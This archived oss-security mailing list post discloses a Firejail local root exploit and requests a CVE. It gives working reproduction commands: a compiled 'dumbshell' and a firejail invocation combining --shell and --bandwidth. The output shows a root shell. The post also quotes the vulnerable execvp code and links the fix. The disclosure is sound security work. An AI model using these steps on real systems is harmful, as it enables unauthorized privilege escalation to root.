Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Sat, 07 Jan 2017 12:13:28 +0100
From: Martin Carpenter <mcarpenter@...e.fr>
To: oss-security@...ts.openwall.com
Subject: Re: Re: Firejail local root exploit

On Thu, 2017-01-05 at 23:37 +0100, Martin Carpenter wrote:
> A handful of concrete examples that I have reported are below.

Another (new) one: MITRE can you please assign a CVE?

6. Root shell via --bandwidth and --shell

Reported at:
https://github.com/netblue30/firejail/issues/1023

Fixed at:
  commit 5d43fdcd215203868d440ffc42036f5f5ffc89fc
  Author: netblue30 <netblue30@...oo.com>
  Date:   Fri Jan 6 22:45:11 2017 -0500

      security fix


Quoting for list:

----8<----
[Against current HEAD, commit 64355]

In a first window run:

$ firejail --noprofile --name=x --net=eth0

In a second window, firstly create a dumb shell that ignores -c:

$ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell -

and then secondly invoke that shell via the --shell and --bandwidth
flags to obtain root:

$ firejail --shell=./dumbshell --bandwidth=x status
# id
uid=0(root) gid=0(root)
groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),125(vboxusers),2000(wiki),10000(martin) context=system_u:system_r:initrc_t:s0

Error occurs at
https://github.com/netblue30/firejail/blob/6435525696e8eda2d1bc0ef50488523422b9126d/src/firejail/bandwidth.c#L445-L451

char *arg[4];
arg[0] = cfg.shell;
arg[1] = "-c";
arg[2] = cmd;
arg[3] = NULL;
clearenv();
execvp(arg[0], arg);

I don't see any good reason to permit a user-specified shell to run a
bandwidth command.
----8<----


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ